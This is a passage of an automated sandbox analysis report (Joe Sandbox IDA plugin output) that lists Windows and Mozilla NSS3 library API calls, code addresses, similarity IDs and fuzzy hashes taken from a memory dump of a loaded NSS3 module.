                                                                                                                                                                                                                                                      • API String ID: 3168844106-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C491ECC
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C491EDF
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C491EEF
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C491F37
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C491F44
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$CriticalEnterSection$Monitor$ExitLeaveUnlock
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3539092540-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DE1B
                                                                                                                                                                                                                                                      • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C51DE77
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalLeaveSection$ReleaseSemaphoreValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2700453212-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C48AB10: DeleteCriticalSection.KERNEL32(D958E852,6C491397,5B5F5EC0,?,?,6C48B1EE,2404110F,?,?), ref: 6C48AB3C
                                                                                                                                                                                                                                                        • Part of subcall function 6C48AB10: free.MOZGLUE(D958E836,?,6C48B1EE,2404110F,?,?), ref: 6C48AB49
                                                                                                                                                                                                                                                        • Part of subcall function 6C48AB10: DeleteCriticalSection.KERNEL32(5D5E6C68), ref: 6C48AB5C
                                                                                                                                                                                                                                                        • Part of subcall function 6C48AB10: free.MOZGLUE(5D5E6C5C), ref: 6C48AB63
                                                                                                                                                                                                                                                        • Part of subcall function 6C48AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C48AB6F
                                                                                                                                                                                                                                                        • Part of subcall function 6C48AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C48AB76
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,6C48B266,6C4915C6,?,?,6C4915C6), ref: 6C48DFDA
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,6C48B266,6C4915C6,?,?,6C4915C6), ref: 6C48DFF3
                                                                                                                                                                                                                                                      • PK11_IsFriendly.NSS3(?,?,?,?,6C48B266,6C4915C6,?,?,6C4915C6), ref: 6C48E029
                                                                                                                                                                                                                                                      • PK11_IsLoggedIn.NSS3 ref: 6C48E046
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FAF
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FD1
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FFA
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C499013
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C499042
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C49905A
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C499073
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C499111
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,6C48B266,6C4915C6,?,?,6C4915C6), ref: 6C48E149
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection$DeleteEnterK11_UnlockValuefree$FriendlyInternalLoggedSlot
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4224391822-0
                                                                                                                                                                                                                                                      • Opcode ID: 61a2ca6159a9209e52a7d1b40b5138d84bd189513a760f8fd71e68f511133cec
                                                                                                                                                                                                                                                      • Instruction ID: e1869026af028a5878eb97a2e19af32a448678c643758ebec02bd3d2e935a0b9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 61a2ca6159a9209e52a7d1b40b5138d84bd189513a760f8fd71e68f511133cec
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C3513378602611CBDB10DF29C484F6ABBF1AF85309F19896CD9998BB41D731E884CBC2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,?), ref: 6C49BF06
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C49BF56
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000,?,?,6C479F71,?,?,00000000), ref: 6C49BF7F
                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(00000000), ref: 6C49BFA9
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C49C014
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Item_Util$Zfree$CertificateDestroyEncodeError
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3689625208-0
                                                                                                                                                                                                                                                      • Opcode ID: f1dfcfe6605d0996bfd1255d3afdc4ea293b82dfc463d35c1224ee705283ecc3
                                                                                                                                                                                                                                                      • Instruction ID: f6500dc44803987a25ea61dc1f1b1107328e37baef31a1bb060311911bf09f16
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1dfcfe6605d0996bfd1255d3afdc4ea293b82dfc463d35c1224ee705283ecc3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1741E975B012119BEB10DE65CC80FBA7BB9AF45209F114128ED1AD7B45FB31D905CBE1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C46EDFD
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000000), ref: 6C46EE64
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C46EECC
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C46EEEB
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C46EEF6
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorValuecallocfreememcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3833505462-0
                                                                                                                                                                                                                                                      • Opcode ID: 7405ca5d9967a776f96834a3bda80a37163754411222826b3671891bc4f714dc
                                                                                                                                                                                                                                                      • Instruction ID: 1769c739fabcabf9237554b4ccb8e46445cd88f911ffd4e05541cdc027d2466b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7405ca5d9967a776f96834a3bda80a37163754411222826b3671891bc4f714dc
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C83134B1A006009BEB20DF2ACC84F667BF4FB46306F050629E95A87F54E731E815CBD9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C481F1C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(00000000,0000000100000017,FFFFFFFF,6C599EBC), ref: 6C481FB8
                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(6C599E9C,?,?,6C599E9C), ref: 6C48200A
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE022,00000000), ref: 6C482020
                                                                                                                                                                                                                                                        • Part of subcall function 6C476A60: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C47AD50,?,?), ref: 6C476A98
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C482030
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$ArenaArena_EncodeItem_$Alloc_ErrorFreeInitLockPoolcalloc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1390266749-0
                                                                                                                                                                                                                                                      • Opcode ID: afa848b778c8f04ea3b2a6bce5e139eb2174aeeafd40ad6ebd8bd44e2ad9f7ae
                                                                                                                                                                                                                                                      • Instruction ID: 5b94228ea7dfd8f95bfcff3d543af35f26d41ceffa2ba222fa40132b4c6fd94e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: afa848b778c8f04ea3b2a6bce5e139eb2174aeeafd40ad6ebd8bd44e2ad9f7ae
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98219375902506ABEB11DA15DC40FEA7778FF42219F140225ED3996F90EB32E528C7E2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C471E0B
                                                                                                                                                                                                                                                      • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C471E24
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C471E3B
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C471E8A
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C471EAD
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Error$Choice_DecodeTimeUtil
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1529734605-0
                                                                                                                                                                                                                                                      • Opcode ID: b0b168a3d74ffec76d73eb17694a10085facb2cfa8deea268b53177d9d8b38ee
                                                                                                                                                                                                                                                      • Instruction ID: 2769958b98d2b8984ef7d237bb316a0049d0f6c502fb4ada5162b73544ee4a5b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0b168a3d74ffec76d73eb17694a10085facb2cfa8deea268b53177d9d8b38ee
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3221F172E08210A7E710DE68DC51F8A73949B84329F154638FD6D57B80E730E90887E2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?,?,6C49002B,?), ref: 6C491875
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,6C49002B,?), ref: 6C49188E
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,6C49002B,?), ref: 6C4918A7
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?,?,?,?,6C49002B,?), ref: 6C491905
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,6C49002B,?), ref: 6C491912
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$CriticalEnterSection$Monitor$ExitLeaveUnlock
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3539092540-0
                                                                                                                                                                                                                                                      • Opcode ID: 3525ace8ce06f9db112340df955acad6d2219220bb71059bb9d60e20300d3f6d
                                                                                                                                                                                                                                                      • Instruction ID: b0ccaa5d021d374cbd0cf9815fed14040660a14f2c188a6f392211dd70ca8444
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3525ace8ce06f9db112340df955acad6d2219220bb71059bb9d60e20300d3f6d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19214F74A446259BDB00EF79C484E99BBF8FF06359F114A29D894C7B00E730E994CBD2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C581E5C
                                                                                                                                                                                                                                                        • Part of subcall function 6C539BF0: TlsGetValue.KERNEL32(?,?,?,6C580A75), ref: 6C539C07
                                                                                                                                                                                                                                                      • PR_Lock.NSS3(00000000), ref: 6C581E75
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C581EAB
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C581ED0
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C581EE8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentThread$ErrorLockUnlockValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 121300776-0
                                                                                                                                                                                                                                                      • Opcode ID: 8f82d8443f40325f91a12faa91a1701402969371f38a66493c83f1fcf5903e3e
                                                                                                                                                                                                                                                      • Instruction ID: 0e3e7c132015e4ad3ee8e112b9a22b1ad29bcedb377a46287772c0c6ffe5da16
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f82d8443f40325f91a12faa91a1701402969371f38a66493c83f1fcf5903e3e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB217C74A165229BD710CF19DD40A47BBB1BF84718B258225D8299BF40D730FC54CBE5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C47E708,00000000,00000000,00000004,00000000), ref: 6C4CBE6A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D08B4
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C4804DC,?), ref: 6C4CBE7E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C4CBEC2
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE006,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C4804DC,?,?), ref: 6C4CBED7
                                                                                                                                                                                                                                                      • SECITEM_AllocItem_Util.NSS3(?,?,00000002,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C4CBEEB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Item_$CopyError$AllocAlloc_ArenaFindTag_memcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1367977078-0
                                                                                                                                                                                                                                                      • Opcode ID: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
                                                                                                                                                                                                                                                      • Instruction ID: ab2c2be9772e236b6143e70a005437e47bdafe2eb4cfcf9abd24b3cec9ea5c4f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9711EFAEB0465567E700C965AC80F6B776D9B80B9AF044125FE04C7B72E721D80486E3
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(00000000,?,6C473FFF,00000000,?,?,?,?,?,6C471A1C,00000000,00000000), ref: 6C47ADA7
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C473FFF,00000000,?,?,?,?,?,6C471A1C,00000000,00000000), ref: 6C47ADB4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,?,6C473FFF,?,?,?,?,6C473FFF,00000000,?,?,?,?,?,6C471A1C,00000000), ref: 6C47ADD5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C5994B0,?,?,?,?,?,?,?,?,6C473FFF,00000000,?), ref: 6C47ADEC
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C473FFF), ref: 6C47AE3C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2372449006-0
